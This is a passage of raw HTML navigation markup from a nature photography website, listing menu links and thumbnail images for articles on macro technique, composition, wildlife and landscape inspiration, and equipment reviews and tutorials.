Eclipse</span></a></li></ul></li></ul></li><li id="menu-item-7135" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-7135 ubermenu-item-auto ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/photography-tutorials/macro/"><span class="ubermenu-target-title ubermenu-target-text">Macro</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-7135 ubermenu-submenu-type-tab-content-panel"><li class=" ubermenu-autocolumn menu-item-7136-col-0 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-7136-col-0"><ul class="ubermenu-submenu ubermenu-submenu-id-7136-col-0 ubermenu-submenu-type-stack"><li id="menu-item-7136-post-13601" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-7136 ubermenu-item-7136-post-13601 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/5-tips-for-shooting-insect-macro-photos-with-personality/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/01/Macro-photos-with-personallity-7-560x370.jpg" width="560" height="370" alt="How to take macro photographs" /><span class="ubermenu-target-title ubermenu-target-text">5 Tips for Shooting Insect Macro Photos with Personality</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-7136-col-1 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-7136-col-1"><ul class="ubermenu-submenu ubermenu-submenu-id-7136-col-1 ubermenu-submenu-type-stack"><li id="menu-item-7136-post-13442" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-7136 ubermenu-item-7136-post-13442 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/coastal-close-up-macro-photos/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/12/Coastal-macro-photography-2-560x370.jpg" width="560" height="370" alt="coastal macro photography ideas" /><span class="ubermenu-target-title ubermenu-target-text">How to Take Coastal Close-up Macro Photos</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-7136-col-2 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-7136-col-2"><ul class="ubermenu-submenu ubermenu-submenu-id-7136-col-2 ubermenu-submenu-type-stack"><li id="menu-item-7136-post-13107" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-7136 ubermenu-item-7136-post-13107 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/abstract-macro-photos/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/11/macro-abstract-photos-560x370.jpg" width="560" height="370" alt="abstract macro photos" /><span class="ubermenu-target-title ubermenu-target-text">How to Take Abstract Macro Photos</span></a></li></ul></li></ul></li><li id="menu-item-6426" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-6426 ubermenu-item-auto ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/photography-tutorials/basics"><span class="ubermenu-target-title ubermenu-target-text">Basics</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-6426 ubermenu-submenu-type-tab-content-panel"><li class=" ubermenu-autocolumn menu-item-6424-col-0 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6424-col-0"><ul class="ubermenu-submenu ubermenu-submenu-id-6424-col-0 ubermenu-submenu-type-stack"><li id="menu-item-6424-post-12349" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6424 ubermenu-item-6424-post-12349 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/rule-of-thirds/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/08/rule-of-thirds-photography-lead-560x370.jpg" width="560" height="370" alt="rule-of-thirds-photography-lead" /><span class="ubermenu-target-title ubermenu-target-text">Rule of Thirds in Photography: Composition Tips</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6424-col-1 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6424-col-1"><ul class="ubermenu-submenu ubermenu-submenu-id-6424-col-1 ubermenu-submenu-type-stack"><li id="menu-item-6424-post-11229" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6424 ubermenu-item-6424-post-11229 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/5-things-know-stop-shooting-fully-automatic/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/02/full-automatic-camera-mode-560x370.jpg" srcset="https://www.naturettl.com/wp-content/uploads/2018/02/full-automatic-camera-mode-560x370.jpg 560w, https://www.naturettl.com/wp-content/uploads/2018/02/full-automatic-camera-mode-300x198.jpg 300w, https://www.naturettl.com/wp-content/uploads/2018/02/full-automatic-camera-mode-768x506.jpg 768w, https://www.naturettl.com/wp-content/uploads/2018/02/full-automatic-camera-mode-1024x675.jpg 1024w, https://www.naturettl.com/wp-content/uploads/2018/02/full-automatic-camera-mode-800x527.jpg 800w, https://www.naturettl.com/wp-content/uploads/2018/02/full-automatic-camera-mode-550x362.jpg 550w, https://www.naturettl.com/wp-content/uploads/2018/02/full-automatic-camera-mode-900x593.jpg 900w, https://www.naturettl.com/wp-content/uploads/2018/02/full-automatic-camera-mode.jpg 1600w" sizes="(max-width: 560px) 100vw, 560px" width="560" height="370" alt="full-automatic-camera-mode" /><span class="ubermenu-target-title ubermenu-target-text">5 Things to Know When You Stop Shooting in Fully Automatic</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6424-col-2 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6424-col-2"><ul class="ubermenu-submenu ubermenu-submenu-id-6424-col-2 ubermenu-submenu-type-stack"><li id="menu-item-6424-post-7384" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6424 ubermenu-item-6424-post-7384 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/how-to-beat-photographers-block-when-youre-stuck-for-inspiration/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2016/12/how-to-beat-photographers-block-2-560x370.jpg" width="560" height="370" alt="how-to-beat-photographers-block-2" /><span class="ubermenu-target-title ubermenu-target-text">How to Beat &#8216;Photographer&#8217;s Block&#8217; When You&#8217;re Stuck for Inspiration</span></a></li></ul></li></ul></li><li id="menu-item-7240" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-7240 ubermenu-item-auto ubermenu-column ubermenu-column-full"><a class="ubermenu-target ubermenu-target-with-icon ubermenu-item-layout-default ubermenu-item-layout-icon_left all-menu-link" href="/photography-tutorials/"><i class="ubermenu-icon fas fa-camera"></i><span class="ubermenu-target-title ubermenu-target-text">All Tutorials</span></a></li></ul></li></ul></li><li id="menu-item-6384" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-has-children ubermenu-item-6384 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-mega"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only ubermenu-noindicator" href="https://www.naturettl.com/inspiration/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Inspiration</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-6384 ubermenu-submenu-type-auto ubermenu-submenu-type-mega ubermenu-submenu-drop ubermenu-submenu-align-full_width"><li id="menu-item-6395" class="ubermenu-item ubermenu-tabs ubermenu-item-6395 ubermenu-item-level-1 ubermenu-column ubermenu-column-full ubermenu-tab-layout-left ubermenu-tabs-show-default ubermenu-tabs-show-current"><ul class="ubermenu-tabs-group ubermenu-column ubermenu-column-1-4 ubermenu-submenu ubermenu-submenu-id-6395 ubermenu-submenu-type-auto ubermenu-submenu-type-tabs-group"><li id="menu-item-6398" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-6398 ubermenu-item-auto ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/inspiration/wildlife-inspiration/"><span class="ubermenu-target-title ubermenu-target-text">Wildlife</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-6398 ubermenu-submenu-type-tab-content-panel"><li class=" ubermenu-autocolumn menu-item-6401-col-0 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6401-col-0"><ul class="ubermenu-submenu ubermenu-submenu-id-6401-col-0 ubermenu-submenu-type-stack"><li id="menu-item-6401-post-14704" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6401 ubermenu-item-6401-post-14704 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/comedy-wildlife-photo-awards-2019-best-entries-so-far/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/05/comedy-2019-5-560x370.jpg" width="560" height="370" alt="comedy-2019 &#8211; 5" /><span class="ubermenu-target-title ubermenu-target-text">Comedy Wildlife Photo Awards 2019 &#8211; Best Entries So Far!</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6401-col-1 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6401-col-1"><ul class="ubermenu-submenu ubermenu-submenu-id-6401-col-1 ubermenu-submenu-type-stack"><li id="menu-item-6401-post-14555" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6401 ubermenu-item-6401-post-14555 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/photographing-the-worlds-last-two-northern-white-rhinos/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/04/rhino-header-1-560x370.jpg" width="560" height="370" alt="Ol Pejeta images by Justin Mott" /><span class="ubermenu-target-title ubermenu-target-text">Photographing the World&#8217;s Last Two Northern White Rhinos</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6401-col-2 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6401-col-2"><ul class="ubermenu-submenu ubermenu-submenu-id-6401-col-2 ubermenu-submenu-type-stack"><li id="menu-item-6401-post-14526" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6401 ubermenu-item-6401-post-14526 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/bees-sleeping-in-flowers-is-a-heart-warming-sight/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/04/bee-flower-4-560x370.jpg" width="560" height="370" alt="bee-flower &#8211; 4" /><span class="ubermenu-target-title ubermenu-target-text">Bees Sleeping in Flowers is a Heart-Warming Sight</span></a></li></ul></li></ul></li><li id="menu-item-6396" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-6396 ubermenu-item-auto ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/inspiration/landscape-inspiration"><span class="ubermenu-target-title ubermenu-target-text">Landscape</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-6396 ubermenu-submenu-type-tab-content-panel"><li class=" ubermenu-autocolumn menu-item-6399-col-0 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6399-col-0"><ul class="ubermenu-submenu ubermenu-submenu-id-6399-col-0 ubermenu-submenu-type-stack"><li id="menu-item-6399-post-13563" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6399 ubermenu-item-6399-post-13563 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/stunning-images-of-englands-most-haunted-forest/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/01/wistmans-burnell1-560x370.jpg" width="560" height="370" alt="wistmans-burnell1" /><span class="ubermenu-target-title ubermenu-target-text">Stunning Images of England&#8217;s &#8216;Most Haunted&#8217; Forest</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6399-col-1 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6399-col-1"><ul class="ubermenu-submenu ubermenu-submenu-id-6399-col-1 ubermenu-submenu-type-stack"><li id="menu-item-6399-post-13054" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6399 ubermenu-item-6399-post-13054 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/astronomy-photography-of-the-year-2018-winners/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/10/astro-2018-560x370.jpg" width="560" height="370" alt="astro-2018" /><span class="ubermenu-target-title ubermenu-target-text">Astronomy Photography of the Year 2018 Winners</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6399-col-2 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6399-col-2"><ul class="ubermenu-submenu ubermenu-submenu-id-6399-col-2 ubermenu-submenu-type-stack"><li id="menu-item-6399-post-12219" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6399 ubermenu-item-6399-post-12219 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/photographer-creates-volcanic-landscapes-macro-leaves/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/08/macro-leaves4-560x370.jpg" width="560" height="370" alt="macro-leaves4" /><span class="ubermenu-target-title ubermenu-target-text">Photographer Creates Volcanic Landscapes from Macro Leaves</span></a></li></ul></li></ul></li><li id="menu-item-6397" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-6397 ubermenu-item-auto ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/inspiration/opinion"><span class="ubermenu-target-title ubermenu-target-text">Opinion</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-6397 ubermenu-submenu-type-tab-content-panel"><li class=" ubermenu-autocolumn menu-item-6400-col-0 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6400-col-0"><ul class="ubermenu-submenu ubermenu-submenu-id-6400-col-0 ubermenu-submenu-type-stack"><li id="menu-item-6400-post-14298" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6400 ubermenu-item-6400-post-14298 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/photography-ethics-freezing-insects-for-macro/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/03/photography-ethics-freezing-insects-macro-4-560x370.jpg" width="560" height="370" alt="photography-ethics-freezing-insects-macro-4" /><span class="ubermenu-target-title ubermenu-target-text">Photography Ethics: Freezing Insects for Macro</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6400-col-1 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6400-col-1"><ul class="ubermenu-submenu ubermenu-submenu-id-6400-col-1 ubermenu-submenu-type-stack"><li id="menu-item-6400-post-11883" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6400 ubermenu-item-6400-post-11883 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/the-delicate-balance-of-photography-and-family-life/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/06/family-photography-balance-5-560x370.jpg" width="560" height="370" alt="family vs photography balance" /><span class="ubermenu-target-title ubermenu-target-text">The Delicate Balance of Photography and Family Life</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6400-col-2 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6400-col-2"><ul class="ubermenu-submenu ubermenu-submenu-id-6400-col-2 ubermenu-submenu-type-stack"><li id="menu-item-6400-post-11492" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6400 ubermenu-item-6400-post-11492 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/has-facebook-become-useless-for-photographers/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/04/facebook-useless-lead-560x370.jpg" width="560" height="370" alt="facebook-useless-lead" /><span class="ubermenu-target-title ubermenu-target-text">Has Facebook Become Useless for Photographers?</span></a></li></ul></li></ul></li><li id="menu-item-7241" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-7241 ubermenu-item-auto ubermenu-column ubermenu-column-full"><a class="ubermenu-target ubermenu-target-with-icon ubermenu-item-layout-default ubermenu-item-layout-icon_left all-menu-link" href="/inspiration"><i class="ubermenu-icon far fa-image"></i><span class="ubermenu-target-title ubermenu-target-text">All Inspiration</span></a></li></ul></li></ul></li><li id="menu-item-10" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-10 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-mega"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only ubermenu-noindicator" href="/equipment" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Equipment</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-10 ubermenu-submenu-type-mega ubermenu-submenu-drop ubermenu-submenu-align-full_width"><li id="menu-item-731" class="ubermenu-item ubermenu-tabs ubermenu-item-731 ubermenu-item-level-1 ubermenu-column ubermenu-column-full ubermenu-tab-layout-left ubermenu-tabs-show-default ubermenu-tabs-show-current"><ul class="ubermenu-tabs-group ubermenu-column ubermenu-column-1-4 ubermenu-submenu ubermenu-submenu-id-731 ubermenu-submenu-type-auto ubermenu-submenu-type-tabs-group"><li id="menu-item-734" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-734 ubermenu-item-auto ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/equipment/reviews"><span class="ubermenu-target-title ubermenu-target-text">Reviews</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-734 ubermenu-submenu-type-tab-content-panel"><li class=" ubermenu-autocolumn menu-item-6393-col-0 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6393-col-0"><ul class="ubermenu-submenu ubermenu-submenu-id-6393-col-0 ubermenu-submenu-type-stack"><li id="menu-item-6393-post-14200" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6393 ubermenu-item-6393-post-14200 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/lee100-review-filter-system/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/03/lee100-review-filter-system-20-560x370.jpg" width="560" height="370" alt="lee100 review filter system" /><span class="ubermenu-target-title ubermenu-target-text">LEE100 Review: LEE Filters&#8217; New &#038; Improved System</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6393-col-1 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6393-col-1"><ul class="ubermenu-submenu ubermenu-submenu-id-6393-col-1 ubermenu-submenu-type-stack"><li id="menu-item-6393-post-13522" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6393 ubermenu-item-6393-post-13522 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/laowa-10-18mm-review/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/01/Laowa-10-18mm-review-35-560x370.jpg" width="560" height="370" alt="Laowa-10-18mm-review-35" /><span class="ubermenu-target-title ubermenu-target-text">Laowa 10-18mm f/4.5-5.6 Review: The World&#8217;s Widest Zoom Lens</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6393-col-2 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6393-col-2"><ul class="ubermenu-submenu ubermenu-submenu-id-6393-col-2 ubermenu-submenu-type-stack"><li id="menu-item-6393-post-13796" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6393 ubermenu-item-6393-post-13796 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/luminar-3-review/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/02/luminar-3-review-hero-560x370.jpg" width="560" height="370" alt="luminar 3 review" /><span class="ubermenu-target-title ubermenu-target-text">Luminar 3 Review: Is this the Lightroom Killer?</span></a></li></ul></li></ul></li><li id="menu-item-733" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-733 ubermenu-item-auto ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover"><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/equipment/equipment-tutorials"><span class="ubermenu-target-title ubermenu-target-text">Tutorials</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-733 ubermenu-submenu-type-tab-content-panel"><li class=" ubermenu-autocolumn menu-item-6392-col-0 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6392-col-0"><ul class="ubermenu-submenu ubermenu-submenu-id-6392-col-0 ubermenu-submenu-type-stack"><li id="menu-item-6392-post-13815" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6392 ubermenu-item-6392-post-13815 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/essential-equipment-photography-snow/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2019/02/photography-gear-snow-winter-cold-560x370.jpg" width="560" height="370" alt="gear for photography in the snow" /><span class="ubermenu-target-title ubermenu-target-text">Essential Equipment for Photography in the Snow</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6392-col-1 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6392-col-1"><ul class="ubermenu-submenu ubermenu-submenu-id-6392-col-1 ubermenu-submenu-type-stack"><li id="menu-item-6392-post-13150" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post ubermenu-item-6392 ubermenu-item-6392-post-13150 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto"><a class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left" href="https://www.naturettl.com/do-you-need-camera-insurance/"><img class="ubermenu-image ubermenu-image-size-nav_image" src="https://www.naturettl.com/wp-content/uploads/2018/11/do-you-need-camera-insurance-560x370.jpg" width="560" height="370" alt="do-you-need-camera-insurance" /><span class="ubermenu-target-title ubermenu-target-text">Do You Need Camera Insurance as a Photographer?</span></a></li></ul></li><li class=" ubermenu-autocolumn menu-item-6392-col-2 ubermenu-item-level-4 ubermenu-column ubermenu-column-1-3 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-6392-col-2"><ul class="ubermenu-submenu ubermenu-submenu-id-6392-col-2 ubermenu-submenu-type-stack"><li id="menu-item-6392-post-12906" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-dynamic-post 